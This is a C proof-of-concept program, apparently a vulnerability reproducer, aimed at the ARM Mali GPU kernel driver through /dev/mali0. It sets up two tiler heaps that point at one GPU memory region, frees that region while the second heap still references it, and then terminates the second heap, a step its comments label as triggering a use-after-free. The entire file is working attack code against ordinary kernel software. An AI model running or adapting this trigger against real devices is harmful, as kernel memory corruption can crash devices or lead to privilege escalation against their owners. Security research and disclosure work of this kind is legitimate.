#define _GNU_SOURCE
#define _FILE_OFFSET_BITS 64
#include <fcntl.h>
#include <err.h>
#include <stdint.h>
#include <stdio.h>
#include <assert.h>
#include <stdlib.h>
#include <unistd.h>
#include <ctype.h>
#include <sys/ioctl.h>
#include <sys/mman.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

#define KBASE_IOCTL_TYPE 0x80

#define __u8  uint8_t
#define __u16 uint16_t
#define __u32 uint32_t
#define __u64 uint64_t

struct kbase_ioctl_version_check {
        __u16 major;
        __u16 minor;
};
#define KBASE_IOCTL_VERSION_CHECK \
        _IOWR(KBASE_IOCTL_TYPE, 52, struct kbase_ioctl_version_check)

struct kbase_ioctl_set_flags {
        __u32 create_flags;
};
#define KBASE_IOCTL_SET_FLAGS \
        _IOW(KBASE_IOCTL_TYPE, 1, struct kbase_ioctl_set_flags)

union kbase_ioctl_cs_tiler_heap_init {
	struct {
		__u32 chunk_size;
		__u32 initial_chunks;
		__u32 max_chunks;
		__u16 target_in_flight;
		__u8 group_id;
		__u8 padding;
		__u64 buf_desc_va;
	} in;
	struct {
		__u64 gpu_heap_va;
		__u64 first_chunk_va;
	} out;
};

#define KBASE_IOCTL_CS_TILER_HEAP_INIT \
	_IOWR(KBASE_IOCTL_TYPE, 48, union kbase_ioctl_cs_tiler_heap_init)

struct kbase_ioctl_cs_tiler_heap_term {
	__u64 gpu_heap_va;
};

#define KBASE_IOCTL_CS_TILER_HEAP_TERM \
	_IOW(KBASE_IOCTL_TYPE, 49, struct kbase_ioctl_cs_tiler_heap_term)

union kbase_ioctl_mem_alloc {
	struct {
		__u64 va_pages;
		__u64 commit_pages;
		__u64 extension;
		__u64 flags;
	} in;
	struct {
		__u64 flags;
		__u64 gpu_va;
	} out;
};
#define KBASE_IOCTL_MEM_ALLOC \
	_IOWR(KBASE_IOCTL_TYPE, 5, union kbase_ioctl_mem_alloc)

struct kbase_ioctl_mem_free {
	__u64 gpu_addr;
};
#define KBASE_IOCTL_MEM_FREE \
	_IOW(KBASE_IOCTL_TYPE, 7, struct kbase_ioctl_mem_free)


#define LOCAL_PAGE_SHIFT 12
#define BASE_MEM_MAP_TRACKING_HANDLE (3ul << LOCAL_PAGE_SHIFT)

int main(void) {
  int mali_fd = SYSCHK(open("/dev/mali0", O_RDWR));

  struct kbase_ioctl_version_check vc = {
    .major = 11,
    .minor = 11
  };
  SYSCHK(ioctl(mali_fd, KBASE_IOCTL_VERSION_CHECK, &vc));
  struct kbase_ioctl_set_flags set_flags = { .create_flags = 0 };
  SYSCHK(ioctl(mali_fd, KBASE_IOCTL_SET_FLAGS, &set_flags));
  void *tracking_page = SYSCHK(mmap(NULL, 0x1000, PROT_NONE, MAP_SHARED,
        mali_fd, BASE_MEM_MAP_TRACKING_HANDLE));

  union kbase_ioctl_mem_alloc ma = {
    .in = { .va_pages = 1, .commit_pages = 1, .flags = 0xf/*RW for CPU+GPU*/ }
  };
  SYSCHK(ioctl(mali_fd, KBASE_IOCTL_MEM_ALLOC, &ma));
  __u64 gpu_va = ma.out.gpu_va;
  printf("gpu_va = 0x%llx\n", (unsigned long long)gpu_va);
  assert((ma.out.flags & (1<<13)/*BASE_MEM_SAME_VA*/) == 0);
  //void *cpu_va = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, mali_fd, gpu_va));

  union kbase_ioctl_cs_tiler_heap_init thi1 = { .in = {
    .chunk_size = (1<<12),
    .initial_chunks = 1,
    .max_chunks = 1,
    .target_in_flight = 1,
    .group_id = 0,
    .padding = 0,
    .buf_desc_va = gpu_va
  }};
  SYSCHK(ioctl(mali_fd, KBASE_IOCTL_CS_TILER_HEAP_INIT, &thi1));
  union kbase_ioctl_cs_tiler_heap_init thi2 = { .in = {
    .chunk_size = (1<<12),
    .initial_chunks = 1,
    .max_chunks = 1,
    .target_in_flight = 1,
    .group_id = 0,
    .padding = 0,
    .buf_desc_va = gpu_va
  }};
  SYSCHK(ioctl(mali_fd, KBASE_IOCTL_CS_TILER_HEAP_INIT, &thi2));

  // clear KBASE_REG_NO_USER_FREE
	struct kbase_ioctl_cs_tiler_heap_term tht1 = {
    .gpu_heap_va = thi1.out.gpu_heap_va
  };
  SYSCHK(ioctl(mali_fd, KBASE_IOCTL_CS_TILER_HEAP_TERM, &tht1));

  // free region while the second tiler heap is still pointing at it
  struct kbase_ioctl_mem_free mf = {
    .gpu_addr = gpu_va
  };
  SYSCHK(ioctl(mali_fd, KBASE_IOCTL_MEM_FREE, &mf));

  // trigger UAF
	struct kbase_ioctl_cs_tiler_heap_term tht2 = {
    .gpu_heap_va = thi2.out.gpu_heap_va
  };
  SYSCHK(ioctl(mali_fd, KBASE_IOCTL_CS_TILER_HEAP_TERM, &tht2));
}
